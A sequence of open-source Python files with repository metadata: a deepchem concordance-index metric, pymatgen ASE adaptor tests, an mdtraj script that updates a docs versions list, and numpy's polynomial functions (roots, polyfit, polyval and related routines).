    Continuous ground truth values
y_pred: np.ndarray
Predicted value
Returns
-------
float
score between [0,1]
References
----------
.. [1] Steck, Harald, et al. "On ranking in survival analysis:
Bounds on the concordance index." Advances in neural information processing systems (2008): 1209-1216.
"""
idx = np.argsort(y_true)
y_true = y_true[idx]
y_pred = y_pred[idx]
pairs = 0
correct_pairs = 0.0
for i in range(len(y_true)):
true_a = y_true[i]
pred_a = y_pred[i]
for j in range(i + 1, len(y_true)):
true_b = y_true[j]
pred_b = y_pred[j]
if true_a != true_b:
pairs += 1
if pred_a == pred_b:
correct_pairs += 0.5
elif pred_a < pred_b:
correct_pairs += true_a < true_b
else:
correct_pairs += true_a > true_b
  assert pairs > 0, 'No pairs for comparison'
return correct_pairs / pairs
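# A short worked example: with three points, one swapped pair out of the
# three comparable pairs gives a concordance index of 2/3.
#
#   concordance_index(np.array([1.0, 2.0, 3.0]), np.array([1.0, 3.0, 2.0]))
#   # -> 0.666...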
|
lilleswing/deepchem
|
deepchem/metrics/score_function.py
|
Python
|
mit
| 5,680
|
[
"RDKit"
] |
b0053931b5ba5a03b0d23a8a31680db77252ec44277a761ad6c62da2df1bba98
|
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
import os
import unittest
import numpy as np
import pymatgen.io.ase as aio
from pymatgen.core.composition import Composition
from pymatgen.core.structure import Molecule
from pymatgen.io.vasp.inputs import Poscar
from pymatgen.util.testing import PymatgenTest
class AseAtomsAdaptorTest(unittest.TestCase):
@unittest.skipIf(not aio.ase_loaded, "ASE not loaded.")
def test_get_atoms_from_structure(self):
p = Poscar.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "POSCAR"))
structure = p.structure
atoms = aio.AseAtomsAdaptor.get_atoms(structure)
ase_composition = Composition(atoms.get_chemical_formula())
self.assertEqual(ase_composition, structure.composition)
self.assertTrue(atoms.cell is not None and atoms.cell.any())
self.assertTrue(atoms.get_pbc() is not None and atoms.get_pbc().all())
self.assertEqual(atoms.get_chemical_symbols(), [s.species_string for s in structure])
self.assertFalse(atoms.has("initial_magmoms"))
@unittest.skipIf(not aio.ase_loaded, "ASE not loaded.")
def test_get_atoms_from_structure_mags(self):
p = Poscar.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "POSCAR"))
structure = p.structure
mags = [1.0] * len(structure)
structure.add_site_property("magmom", mags)
atoms = aio.AseAtomsAdaptor.get_atoms(structure)
self.assertFalse(atoms.has("initial_magmoms"))
self.assertEqual(atoms.get_magnetic_moments().tolist(), mags)
p = Poscar.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "POSCAR"))
structure = p.structure
mags = [1.0] * len(structure)
structure.add_site_property("magmom", mags)
initial_mags = [2.0] * len(structure)
structure.add_site_property("initial_magmom", initial_mags)
atoms = aio.AseAtomsAdaptor.get_atoms(structure)
        self.assertEqual(atoms.get_initial_magnetic_moments().tolist(), initial_mags)
@unittest.skipIf(not aio.ase_loaded, "ASE not loaded.")
def test_get_atoms_from_structure_dyn(self):
p = Poscar.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "POSCAR"))
structure = p.structure
structure.add_site_property("selective_dynamics", [[False] * 3] * len(structure))
atoms = aio.AseAtomsAdaptor.get_atoms(structure)
self.assertEqual(atoms.constraints[0].get_indices().tolist(), [atom.index for atom in atoms])
@unittest.skipIf(not aio.ase_loaded, "ASE not loaded.")
def test_get_atoms_from_molecule(self):
m = Molecule.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "acetylene.xyz"))
atoms = aio.AseAtomsAdaptor.get_atoms(m)
ase_composition = Composition(atoms.get_chemical_formula())
self.assertEqual(ase_composition, m.composition)
self.assertTrue(atoms.cell is None or not atoms.cell.any())
self.assertTrue(atoms.get_pbc() is None or not atoms.get_pbc().any())
self.assertEqual(atoms.get_chemical_symbols(), [s.species_string for s in m])
self.assertFalse(atoms.has("initial_magmoms"))
@unittest.skipIf(not aio.ase_loaded, "ASE not loaded.")
def test_get_atoms_from_molecule_mags(self):
molecule = Molecule.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "acetylene.xyz"))
atoms = aio.AseAtomsAdaptor.get_atoms(molecule)
mags = [1.0] * len(molecule)
molecule.add_site_property("magmom", mags)
atoms = aio.AseAtomsAdaptor.get_atoms(molecule)
self.assertFalse(atoms.has("initial_magmoms"))
self.assertEqual(atoms.get_magnetic_moments().tolist(), mags)
@unittest.skipIf(not aio.ase_loaded, "ASE not loaded.")
def test_get_atoms_from_molecule_dyn(self):
from ase.constraints import FixAtoms
molecule = Molecule.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "acetylene.xyz"))
molecule.add_site_property("selective_dynamics", [[False] * 3] * len(molecule))
atoms = aio.AseAtomsAdaptor.get_atoms(molecule)
self.assertEqual(atoms.constraints[0].get_indices().tolist(), [atom.index for atom in atoms])
@unittest.skipIf(not aio.ase_loaded, "ASE not loaded.")
def test_get_structure(self):
from ase.io import read
atoms = read(os.path.join(PymatgenTest.TEST_FILES_DIR, "POSCAR"))
struct = aio.AseAtomsAdaptor.get_structure(atoms)
self.assertEqual(struct.formula, "Fe4 P4 O16")
self.assertEqual([s.species_string for s in struct], atoms.get_chemical_symbols())
@unittest.skipIf(not aio.ase_loaded, "ASE not loaded.")
def test_get_structure_mag(self):
from ase.io import read
atoms = read(os.path.join(PymatgenTest.TEST_FILES_DIR, "POSCAR"))
mags = [1.0] * len(atoms)
atoms.set_initial_magnetic_moments(mags)
structure = aio.AseAtomsAdaptor.get_structure(atoms)
self.assertEqual(structure.site_properties["initial_magmom"], mags)
atoms = read(os.path.join(PymatgenTest.TEST_FILES_DIR, "OUTCAR"))
structure = aio.AseAtomsAdaptor.get_structure(atoms)
self.assertEqual(structure.site_properties["magmom"], atoms.get_magnetic_moments().tolist())
@unittest.skipIf(not aio.ase_loaded, "ASE not loaded.")
def test_get_structure_dyn(self):
from ase.io import read
from ase.constraints import FixAtoms
atoms = read(os.path.join(PymatgenTest.TEST_FILES_DIR, "POSCAR"))
atoms.set_constraint(FixAtoms(mask=[True] * len(atoms)))
structure = aio.AseAtomsAdaptor.get_structure(atoms)
self.assertEqual(structure.site_properties["selective_dynamics"][-1][0], False)
@unittest.skipIf(not aio.ase_loaded, "ASE not loaded.")
def test_get_molecule(self):
from ase.io import read
atoms = read(os.path.join(PymatgenTest.TEST_FILES_DIR, "acetylene.xyz"))
molecule = aio.AseAtomsAdaptor.get_molecule(atoms)
self.assertEqual(molecule.formula, "H2 C2")
self.assertEqual([s.species_string for s in molecule], atoms.get_chemical_symbols())
if __name__ == "__main__":
unittest.main()
|
vorwerkc/pymatgen
|
pymatgen/io/tests/test_ase.py
|
Python
|
mit
| 6,225
|
[
"ASE",
"VASP",
"pymatgen"
] |
6375b21b11b0e73a472c604b349376e1ef96721a0ea4355bee53b44d22127d15
|
import json
try:
from urllib.request import urlopen
except ImportError:
from urllib2 import urlopen
from mdtraj import version
if not version.release:
print("This is not a release.")
exit(0)
URL = 'http://www.mdtraj.org'
data = urlopen(URL + '/versions.json').read().decode()
versions = json.loads(data)
# new release so all the others are now old
for i in range(len(versions)):
versions[i]['latest'] = False
versions.append({
'version': version.short_version,
'display': version.short_version,
'url': "{base}/{version}".format(base=URL, version=version.short_version),
'latest': True})
with open("docs/_deploy/versions.json", 'w') as versionf:
json.dump(versions, versionf, indent=2)
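# For illustration, each appended entry looks like this (the version string
# here is hypothetical):
#
#   {"version": "1.9.0", "display": "1.9.0",
#    "url": "http://www.mdtraj.org/1.9.0", "latest": true}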
|
leeping/mdtraj
|
devtools/travis-ci/update_versions_json.py
|
Python
|
lgpl-2.1
| 732
|
[
"MDTraj"
] |
f839d7199794d2aeebea7aeb6e8575b6a4fee8a86138f994f9cba97ec0ee87b2
|
"""
Functions to operate on polynomials.
"""
from __future__ import division, absolute_import, print_function
__all__ = ['poly', 'roots', 'polyint', 'polyder', 'polyadd',
'polysub', 'polymul', 'polydiv', 'polyval', 'poly1d',
'polyfit', 'RankWarning']
import functools
import re
import warnings
import numpy.core.numeric as NX
from numpy.core import (isscalar, abs, finfo, atleast_1d, hstack, dot, array,
ones)
from numpy.core import overrides
from numpy.core.overrides import set_module
from numpy.lib.twodim_base import diag, vander
from numpy.lib.function_base import trim_zeros
from numpy.lib.type_check import iscomplex, real, imag, mintypecode
from numpy.linalg import eigvals, lstsq, inv
array_function_dispatch = functools.partial(
overrides.array_function_dispatch, module='numpy')
@set_module('numpy')
class RankWarning(UserWarning):
"""
Issued by `polyfit` when the Vandermonde matrix is rank deficient.
For more information, a way to suppress the warning, and an example of
`RankWarning` being issued, see `polyfit`.
"""
pass
def _poly_dispatcher(seq_of_zeros):
return seq_of_zeros
@array_function_dispatch(_poly_dispatcher)
def poly(seq_of_zeros):
"""
Find the coefficients of a polynomial with the given sequence of roots.
Returns the coefficients of the polynomial whose leading coefficient
is one for the given sequence of zeros (multiple roots must be included
in the sequence as many times as their multiplicity; see Examples).
A square matrix (or array, which will be treated as a matrix) can also
be given, in which case the coefficients of the characteristic polynomial
of the matrix are returned.
Parameters
----------
seq_of_zeros : array_like, shape (N,) or (N, N)
A sequence of polynomial roots, or a square array or matrix object.
Returns
-------
c : ndarray
1D array of polynomial coefficients from highest to lowest degree:
``c[0] * x**(N) + c[1] * x**(N-1) + ... + c[N-1] * x + c[N]``
where c[0] always equals 1.
Raises
------
ValueError
If input is the wrong shape (the input must be a 1-D or square
2-D array).
See Also
--------
polyval : Compute polynomial values.
roots : Return the roots of a polynomial.
polyfit : Least squares polynomial fit.
poly1d : A one-dimensional polynomial class.
Notes
-----
Specifying the roots of a polynomial still leaves one degree of
freedom, typically represented by an undetermined leading
coefficient. [1]_ In the case of this function, that coefficient -
the first one in the returned array - is always taken as one. (If
for some reason you have one other point, the only automatic way
presently to leverage that information is to use ``polyfit``.)
The characteristic polynomial, :math:`p_a(t)`, of an `n`-by-`n`
matrix **A** is given by
:math:`p_a(t) = \\mathrm{det}(t\\, \\mathbf{I} - \\mathbf{A})`,
where **I** is the `n`-by-`n` identity matrix. [2]_
References
----------
    .. [1] M. Sullivan and M. Sullivan, III, "Algebra and Trigonometry,
Enhanced With Graphing Utilities," Prentice-Hall, pg. 318, 1996.
.. [2] G. Strang, "Linear Algebra and Its Applications, 2nd Edition,"
Academic Press, pg. 182, 1980.
Examples
--------
Given a sequence of a polynomial's zeros:
>>> np.poly((0, 0, 0)) # Multiple root example
array([1., 0., 0., 0.])
The line above represents z**3 + 0*z**2 + 0*z + 0.
>>> np.poly((-1./2, 0, 1./2))
array([ 1. , 0. , -0.25, 0. ])
The line above represents z**3 - z/4
>>> np.poly((np.random.random(1)[0], 0, np.random.random(1)[0]))
array([ 1. , -0.77086955, 0.08618131, 0. ]) # random
Given a square array object:
>>> P = np.array([[0, 1./3], [-1./2, 0]])
>>> np.poly(P)
array([1. , 0. , 0.16666667])
    Note how the leading coefficient is always 1.
"""
seq_of_zeros = atleast_1d(seq_of_zeros)
sh = seq_of_zeros.shape
if len(sh) == 2 and sh[0] == sh[1] and sh[0] != 0:
seq_of_zeros = eigvals(seq_of_zeros)
elif len(sh) == 1:
dt = seq_of_zeros.dtype
# Let object arrays slip through, e.g. for arbitrary precision
if dt != object:
seq_of_zeros = seq_of_zeros.astype(mintypecode(dt.char))
else:
raise ValueError("input must be 1d or non-empty square 2d array.")
if len(seq_of_zeros) == 0:
return 1.0
dt = seq_of_zeros.dtype
a = ones((1,), dtype=dt)
for k in range(len(seq_of_zeros)):
a = NX.convolve(a, array([1, -seq_of_zeros[k]], dtype=dt),
mode='full')
if issubclass(a.dtype.type, NX.complexfloating):
# if complex roots are all complex conjugates, the roots are real.
roots = NX.asarray(seq_of_zeros, complex)
if NX.all(NX.sort(roots) == NX.sort(roots.conjugate())):
a = a.real.copy()
return a
def _roots_dispatcher(p):
return p
@array_function_dispatch(_roots_dispatcher)
def roots(p):
"""
Return the roots of a polynomial with coefficients given in p.
The values in the rank-1 array `p` are coefficients of a polynomial.
If the length of `p` is n+1 then the polynomial is described by::
p[0] * x**n + p[1] * x**(n-1) + ... + p[n-1]*x + p[n]
Parameters
----------
p : array_like
Rank-1 array of polynomial coefficients.
Returns
-------
out : ndarray
An array containing the roots of the polynomial.
Raises
------
ValueError
When `p` cannot be converted to a rank-1 array.
See also
--------
poly : Find the coefficients of a polynomial with a given sequence
of roots.
polyval : Compute polynomial values.
polyfit : Least squares polynomial fit.
poly1d : A one-dimensional polynomial class.
Notes
-----
The algorithm relies on computing the eigenvalues of the
companion matrix [1]_.
References
----------
.. [1] R. A. Horn & C. R. Johnson, *Matrix Analysis*. Cambridge, UK:
Cambridge University Press, 1999, pp. 146-7.
Examples
--------
>>> coeff = [3.2, 2, 1]
>>> np.roots(coeff)
array([-0.3125+0.46351241j, -0.3125-0.46351241j])
"""
# If input is scalar, this makes it an array
p = atleast_1d(p)
if p.ndim != 1:
raise ValueError("Input must be a rank-1 array.")
# find non-zero array entries
non_zero = NX.nonzero(NX.ravel(p))[0]
# Return an empty array if polynomial is all zeros
if len(non_zero) == 0:
return NX.array([])
# find the number of trailing zeros -- this is the number of roots at 0.
trailing_zeros = len(p) - non_zero[-1] - 1
# strip leading and trailing zeros
p = p[int(non_zero[0]):int(non_zero[-1])+1]
# casting: if incoming array isn't floating point, make it floating point.
if not issubclass(p.dtype.type, (NX.floating, NX.complexfloating)):
p = p.astype(float)
N = len(p)
if N > 1:
# build companion matrix and find its eigenvalues (the roots)
A = diag(NX.ones((N-2,), p.dtype), -1)
A[0,:] = -p[1:] / p[0]
roots = eigvals(A)
else:
roots = NX.array([])
# tack any zeros onto the back of the array
roots = hstack((roots, NX.zeros(trailing_zeros, roots.dtype)))
return roots
def _polyint_dispatcher(p, m=None, k=None):
return (p,)
@array_function_dispatch(_polyint_dispatcher)
def polyint(p, m=1, k=None):
"""
Return an antiderivative (indefinite integral) of a polynomial.
The returned order `m` antiderivative `P` of polynomial `p` satisfies
:math:`\\frac{d^m}{dx^m}P(x) = p(x)` and is defined up to `m - 1`
integration constants `k`. The constants determine the low-order
polynomial part
.. math:: \\frac{k_{m-1}}{0!} x^0 + \\ldots + \\frac{k_0}{(m-1)!}x^{m-1}
of `P` so that :math:`P^{(j)}(0) = k_{m-j-1}`.
Parameters
----------
p : array_like or poly1d
Polynomial to integrate.
A sequence is interpreted as polynomial coefficients, see `poly1d`.
m : int, optional
Order of the antiderivative. (Default: 1)
k : list of `m` scalars or scalar, optional
Integration constants. They are given in the order of integration:
those corresponding to highest-order terms come first.
If ``None`` (default), all constants are assumed to be zero.
If `m = 1`, a single scalar can be given instead of a list.
See Also
--------
polyder : derivative of a polynomial
poly1d.integ : equivalent method
Examples
--------
The defining property of the antiderivative:
>>> p = np.poly1d([1,1,1])
>>> P = np.polyint(p)
>>> P
poly1d([ 0.33333333, 0.5 , 1. , 0. ]) # may vary
>>> np.polyder(P) == p
True
The integration constants default to zero, but can be specified:
>>> P = np.polyint(p, 3)
>>> P(0)
0.0
>>> np.polyder(P)(0)
0.0
>>> np.polyder(P, 2)(0)
0.0
>>> P = np.polyint(p, 3, k=[6,5,3])
>>> P
poly1d([ 0.01666667, 0.04166667, 0.16666667, 3. , 5. , 3. ]) # may vary
Note that 3 = 6 / 2!, and that the constants are given in the order of
integrations. Constant of the highest-order polynomial term comes first:
>>> np.polyder(P, 2)(0)
6.0
>>> np.polyder(P, 1)(0)
5.0
>>> P(0)
3.0
"""
m = int(m)
if m < 0:
raise ValueError("Order of integral must be positive (see polyder)")
if k is None:
k = NX.zeros(m, float)
k = atleast_1d(k)
if len(k) == 1 and m > 1:
k = k[0]*NX.ones(m, float)
if len(k) < m:
raise ValueError(
"k must be a scalar or a rank-1 array of length 1 or >m.")
truepoly = isinstance(p, poly1d)
p = NX.asarray(p)
if m == 0:
if truepoly:
return poly1d(p)
return p
else:
# Note: this must work also with object and integer arrays
y = NX.concatenate((p.__truediv__(NX.arange(len(p), 0, -1)), [k[0]]))
val = polyint(y, m - 1, k=k[1:])
if truepoly:
return poly1d(val)
return val
def _polyder_dispatcher(p, m=None):
return (p,)
@array_function_dispatch(_polyder_dispatcher)
def polyder(p, m=1):
"""
Return the derivative of the specified order of a polynomial.
Parameters
----------
p : poly1d or sequence
Polynomial to differentiate.
A sequence is interpreted as polynomial coefficients, see `poly1d`.
m : int, optional
Order of differentiation (default: 1)
Returns
-------
der : poly1d
A new polynomial representing the derivative.
See Also
--------
polyint : Anti-derivative of a polynomial.
poly1d : Class for one-dimensional polynomials.
Examples
--------
The derivative of the polynomial :math:`x^3 + x^2 + x^1 + 1` is:
>>> p = np.poly1d([1,1,1,1])
>>> p2 = np.polyder(p)
>>> p2
poly1d([3, 2, 1])
which evaluates to:
>>> p2(2.)
17.0
We can verify this, approximating the derivative with
``(f(x + h) - f(x))/h``:
>>> (p(2. + 0.001) - p(2.)) / 0.001
17.007000999997857
The fourth-order derivative of a 3rd-order polynomial is zero:
>>> np.polyder(p, 2)
poly1d([6, 2])
>>> np.polyder(p, 3)
poly1d([6])
>>> np.polyder(p, 4)
poly1d([0.])
"""
m = int(m)
if m < 0:
raise ValueError("Order of derivative must be positive (see polyint)")
truepoly = isinstance(p, poly1d)
p = NX.asarray(p)
n = len(p) - 1
y = p[:-1] * NX.arange(n, 0, -1)
if m == 0:
val = p
else:
val = polyder(y, m - 1)
if truepoly:
val = poly1d(val)
return val
def _polyfit_dispatcher(x, y, deg, rcond=None, full=None, w=None, cov=None):
return (x, y, w)
@array_function_dispatch(_polyfit_dispatcher)
def polyfit(x, y, deg, rcond=None, full=False, w=None, cov=False):
"""
Least squares polynomial fit.
Fit a polynomial ``p(x) = p[0] * x**deg + ... + p[deg]`` of degree `deg`
to points `(x, y)`. Returns a vector of coefficients `p` that minimises
the squared error in the order `deg`, `deg-1`, ... `0`.
The `Polynomial.fit <numpy.polynomial.polynomial.Polynomial.fit>` class
method is recommended for new code as it is more stable numerically. See
the documentation of the method for more information.
Parameters
----------
x : array_like, shape (M,)
x-coordinates of the M sample points ``(x[i], y[i])``.
y : array_like, shape (M,) or (M, K)
y-coordinates of the sample points. Several data sets of sample
points sharing the same x-coordinates can be fitted at once by
passing in a 2D-array that contains one dataset per column.
deg : int
Degree of the fitting polynomial
rcond : float, optional
Relative condition number of the fit. Singular values smaller than
this relative to the largest singular value will be ignored. The
default value is len(x)*eps, where eps is the relative precision of
the float type, about 2e-16 in most cases.
full : bool, optional
Switch determining nature of return value. When it is False (the
default) just the coefficients are returned, when True diagnostic
information from the singular value decomposition is also returned.
w : array_like, shape (M,), optional
Weights to apply to the y-coordinates of the sample points. For
gaussian uncertainties, use 1/sigma (not 1/sigma**2).
cov : bool or str, optional
If given and not `False`, return not just the estimate but also its
        covariance matrix. By default, the covariance matrix is scaled by
chi2/sqrt(N-dof), i.e., the weights are presumed to be unreliable
except in a relative sense and everything is scaled such that the
reduced chi2 is unity. This scaling is omitted if ``cov='unscaled'``,
as is relevant for the case that the weights are 1/sigma**2, with
sigma known to be a reliable estimate of the uncertainty.
Returns
-------
p : ndarray, shape (deg + 1,) or (deg + 1, K)
Polynomial coefficients, highest power first. If `y` was 2-D, the
coefficients for `k`-th data set are in ``p[:,k]``.
residuals, rank, singular_values, rcond
Present only if `full` = True. Residuals is sum of squared residuals
of the least-squares fit, the effective rank of the scaled Vandermonde
coefficient matrix, its singular values, and the specified value of
`rcond`. For more details, see `linalg.lstsq`.
V : ndarray, shape (M,M) or (M,M,K)
Present only if `full` = False and `cov`=True. The covariance
matrix of the polynomial coefficient estimates. The diagonal of
this matrix are the variance estimates for each coefficient. If y
is a 2-D array, then the covariance matrix for the `k`-th data set
are in ``V[:,:,k]``
Warns
-----
RankWarning
The rank of the coefficient matrix in the least-squares fit is
deficient. The warning is only raised if `full` = False.
The warnings can be turned off by
>>> import warnings
>>> warnings.simplefilter('ignore', np.RankWarning)
See Also
--------
polyval : Compute polynomial values.
linalg.lstsq : Computes a least-squares fit.
scipy.interpolate.UnivariateSpline : Computes spline fits.
Notes
-----
The solution minimizes the squared error
.. math ::
E = \\sum_{j=0}^k |p(x_j) - y_j|^2
in the equations::
x[0]**n * p[0] + ... + x[0] * p[n-1] + p[n] = y[0]
x[1]**n * p[0] + ... + x[1] * p[n-1] + p[n] = y[1]
...
x[k]**n * p[0] + ... + x[k] * p[n-1] + p[n] = y[k]
The coefficient matrix of the coefficients `p` is a Vandermonde matrix.
`polyfit` issues a `RankWarning` when the least-squares fit is badly
conditioned. This implies that the best fit is not well-defined due
to numerical error. The results may be improved by lowering the polynomial
degree or by replacing `x` by `x` - `x`.mean(). The `rcond` parameter
can also be set to a value smaller than its default, but the resulting
fit may be spurious: including contributions from the small singular
values can add numerical noise to the result.
Note that fitting polynomial coefficients is inherently badly conditioned
when the degree of the polynomial is large or the interval of sample points
is badly centered. The quality of the fit should always be checked in these
cases. When polynomial fits are not satisfactory, splines may be a good
alternative.
References
----------
.. [1] Wikipedia, "Curve fitting",
https://en.wikipedia.org/wiki/Curve_fitting
.. [2] Wikipedia, "Polynomial interpolation",
https://en.wikipedia.org/wiki/Polynomial_interpolation
Examples
--------
>>> import warnings
>>> x = np.array([0.0, 1.0, 2.0, 3.0, 4.0, 5.0])
>>> y = np.array([0.0, 0.8, 0.9, 0.1, -0.8, -1.0])
>>> z = np.polyfit(x, y, 3)
>>> z
array([ 0.08703704, -0.81349206, 1.69312169, -0.03968254]) # may vary
It is convenient to use `poly1d` objects for dealing with polynomials:
>>> p = np.poly1d(z)
>>> p(0.5)
0.6143849206349179 # may vary
>>> p(3.5)
-0.34732142857143039 # may vary
>>> p(10)
22.579365079365115 # may vary
High-order polynomials may oscillate wildly:
>>> with warnings.catch_warnings():
... warnings.simplefilter('ignore', np.RankWarning)
... p30 = np.poly1d(np.polyfit(x, y, 30))
...
>>> p30(4)
-0.80000000000000204 # may vary
>>> p30(5)
-0.99999999999999445 # may vary
>>> p30(4.5)
-0.10547061179440398 # may vary
Illustration:
>>> import matplotlib.pyplot as plt
>>> xp = np.linspace(-2, 6, 100)
>>> _ = plt.plot(x, y, '.', xp, p(xp), '-', xp, p30(xp), '--')
>>> plt.ylim(-2,2)
(-2, 2)
>>> plt.show()
"""
order = int(deg) + 1
x = NX.asarray(x) + 0.0
y = NX.asarray(y) + 0.0
# check arguments.
if deg < 0:
raise ValueError("expected deg >= 0")
if x.ndim != 1:
raise TypeError("expected 1D vector for x")
if x.size == 0:
raise TypeError("expected non-empty vector for x")
if y.ndim < 1 or y.ndim > 2:
raise TypeError("expected 1D or 2D array for y")
if x.shape[0] != y.shape[0]:
raise TypeError("expected x and y to have same length")
# set rcond
if rcond is None:
rcond = len(x)*finfo(x.dtype).eps
# set up least squares equation for powers of x
lhs = vander(x, order)
rhs = y
# apply weighting
if w is not None:
w = NX.asarray(w) + 0.0
if w.ndim != 1:
raise TypeError("expected a 1-d array for weights")
if w.shape[0] != y.shape[0]:
raise TypeError("expected w and y to have the same length")
lhs *= w[:, NX.newaxis]
if rhs.ndim == 2:
rhs *= w[:, NX.newaxis]
else:
rhs *= w
# scale lhs to improve condition number and solve
scale = NX.sqrt((lhs*lhs).sum(axis=0))
lhs /= scale
c, resids, rank, s = lstsq(lhs, rhs, rcond)
c = (c.T/scale).T # broadcast scale coefficients
# warn on rank reduction, which indicates an ill conditioned matrix
if rank != order and not full:
msg = "Polyfit may be poorly conditioned"
warnings.warn(msg, RankWarning, stacklevel=4)
if full:
return c, resids, rank, s, rcond
elif cov:
Vbase = inv(dot(lhs.T, lhs))
Vbase /= NX.outer(scale, scale)
if cov == "unscaled":
fac = 1
else:
if len(x) <= order:
raise ValueError("the number of data points must exceed order "
"to scale the covariance matrix")
# note, this used to be: fac = resids / (len(x) - order - 2.0)
# it was deciced that the "- 2" (originally justified by "Bayesian
# uncertainty analysis") is not was the user expects
# (see gh-11196 and gh-11197)
fac = resids / (len(x) - order)
if y.ndim == 1:
return c, Vbase * fac
else:
return c, Vbase[:,:, NX.newaxis] * fac
else:
return c
def _polyval_dispatcher(p, x):
return (p, x)
@array_function_dispatch(_polyval_dispatcher)
def polyval(p, x):
"""
Evaluate a polynomial at specific values.
If `p` is of length N, this function returns the value:
``p[0]*x**(N-1) + p[1]*x**(N-2) + ... + p[N-2]*x + p[N-1]``
If `x` is a sequence, then `p(x)` is returned for each element of `x`.
If `x` is another polynomial then the composite polynomial `p(x(t))`
is returned.
Parameters
----------
p : array_like or poly1d object
1D array of polynomial coefficients (including coefficients equal
to zero) from highest degree to the constant term, or an
instance of poly1d.
x : array_like or poly1d object
A number, an array of numbers, or an instance of poly1d, at
which to evaluate `p`.
Returns
-------
values : ndarray or poly1d
If `x` is a poly1d instance, the result is the composition of the two
polynomials, i.e., `x` is "substituted" in `p` and the simplified
result is returned. In addition, the type of `x` - array_like or
poly1d - governs the type of the output: `x` array_like => `values`
array_like, `x` a poly1d object => `values` is also.
See Also
--------
poly1d: A polynomial class.
Notes
-----
Horner's scheme [1]_ is used to evaluate the polynomial. Even so,
for polynomials of high degree the values may be inaccurate due to
rounding errors. Use carefully.
If `x` is a subtype of `ndarray` the return value will be of the same type.
References
----------
.. [1] I. N. Bronshtein, K. A. Semendyayev, and K. A. Hirsch (Eng.
trans. Ed.), *Handbook of Mathematics*, New York, Van Nostrand
Reinhold Co., 1985, pg. 720.
Examples
--------
>>> np.polyval([3,0,1], 5) # 3 * 5**2 + 0 * 5**1 + 1
76
>>> np.polyval([3,0,1], np.poly1d(5))
poly1d([76.])
>>> np.polyval(np.poly1d([3,0,1]), 5)
76
>>> np.polyval(np.poly1d([3,0,1]), np.poly1d(5))
poly1d([76.])
"""
p = NX.asarray(p)
if isinstance(x, poly1d):
y = 0
else:
x = NX.asanyarray(x)
y = NX.zeros_like(x)
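    # Horner's scheme: fold in coefficients from highest degree down,
    # multiplying the running result by x at each step.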
for i in range(len(p)):
y = y * x + p[i]
return y
def _binary_op_dispatcher(a1, a2):
return (a1, a2)
@array_function_dispatch(_binary_op_dispatcher)
def polyadd(a1, a2):
"""
Find the sum of two polynomials.
Returns the polynomial resulting from the sum of two input polynomials.
Each input must be either a poly1d object or a 1D sequence of polynomial
coefficients, from highest to lowest degree.
Parameters
----------
a1, a2 : array_like or poly1d object
Input polynomials.
Returns
-------
out : ndarray or poly1d object
The sum of the inputs. If either input is a poly1d object, then the
output is also a poly1d object. Otherwise, it is a 1D array of
polynomial coefficients from highest to lowest degree.
See Also
--------
poly1d : A one-dimensional polynomial class.
poly, polyadd, polyder, polydiv, polyfit, polyint, polysub, polyval
Examples
--------
>>> np.polyadd([1, 2], [9, 5, 4])
array([9, 6, 6])
Using poly1d objects:
>>> p1 = np.poly1d([1, 2])
>>> p2 = np.poly1d([9, 5, 4])
>>> print(p1)
1 x + 2
>>> print(p2)
2
9 x + 5 x + 4
>>> print(np.polyadd(p1, p2))
2
9 x + 6 x + 6
"""
truepoly = (isinstance(a1, poly1d) or isinstance(a2, poly1d))
a1 = atleast_1d(a1)
a2 = atleast_1d(a2)
diff = len(a2) - len(a1)
if diff == 0:
val = a1 + a2
elif diff > 0:
zr = NX.zeros(diff, a1.dtype)
val = NX.concatenate((zr, a1)) + a2
else:
zr = NX.zeros(abs(diff), a2.dtype)
val = a1 + NX.concatenate((zr, a2))
if truepoly:
val = poly1d(val)
return val
@array_function_dispatch(_binary_op_dispatcher)
def polysub(a1, a2):
"""
Difference (subtraction) of two polynomials.
Given two polynomials `a1` and `a2`, returns ``a1 - a2``.
`a1` and `a2` can be either array_like sequences of the polynomials'
coefficients (including coefficients equal to zero), or `poly1d` objects.
Parameters
----------
a1, a2 : array_like or poly1d
Minuend and subtrahend polynomials, respectively.
Returns
-------
out : ndarray or poly1d
Array or `poly1d` object of the difference polynomial's coefficients.
See Also
--------
polyval, polydiv, polymul, polyadd
Examples
--------
.. math:: (2 x^2 + 10 x - 2) - (3 x^2 + 10 x -4) = (-x^2 + 2)
>>> np.polysub([2, 10, -2], [3, 10, -4])
array([-1, 0, 2])
"""
truepoly = (isinstance(a1, poly1d) or isinstance(a2, poly1d))
a1 = atleast_1d(a1)
a2 = atleast_1d(a2)
diff = len(a2) - len(a1)
if diff == 0:
val = a1 - a2
elif diff > 0:
zr = NX.zeros(diff, a1.dtype)
val = NX.concatenate((zr, a1)) - a2
else:
zr = NX.zeros(abs(diff), a2.dtype)
val = a1 - NX.concatenate((zr, a2))
if truepoly:
val = poly1d(val)
return val
@array_function_dispatch(_binary_op_dispatcher)
def polymul(a1, a2):
"""
Find the product of two polynomials.
Finds the polynomial resulting from the multiplication of the two input
polynomials. Each input must be either a poly1d object or a 1D sequence
of polynomial coefficients, from highest to lowest degree.
Parameters
----------
a1, a2 : array_like or poly1d object
Input polynomials.
Returns
-------
out : ndarray or poly1d object
The polynomial resulting from the multiplication of the inputs. If
either inputs is a poly1d object, then the output is also a poly1d
object. Otherwise, it is a 1D array of polynomial coefficients from
highest to lowest degree.
See Also
--------
poly1d : A one-dimensional polynomial class.
poly, polyadd, polyder, polydiv, polyfit, polyint, polysub, polyval
convolve : Array convolution. Same output as polymul, but has parameter
for overlap mode.
Examples
--------
>>> np.polymul([1, 2, 3], [9, 5, 1])
array([ 9, 23, 38, 17, 3])
Using poly1d objects:
>>> p1 = np.poly1d([1, 2, 3])
>>> p2 = np.poly1d([9, 5, 1])
>>> print(p1)
2
1 x + 2 x + 3
>>> print(p2)
2
9 x + 5 x + 1
>>> print(np.polymul(p1, p2))
4 3 2
9 x + 23 x + 38 x + 17 x + 3
"""
truepoly = (isinstance(a1, poly1d) or isinstance(a2, poly1d))
a1, a2 = poly1d(a1), poly1d(a2)
val = NX.convolve(a1, a2)
if truepoly:
val = poly1d(val)
return val
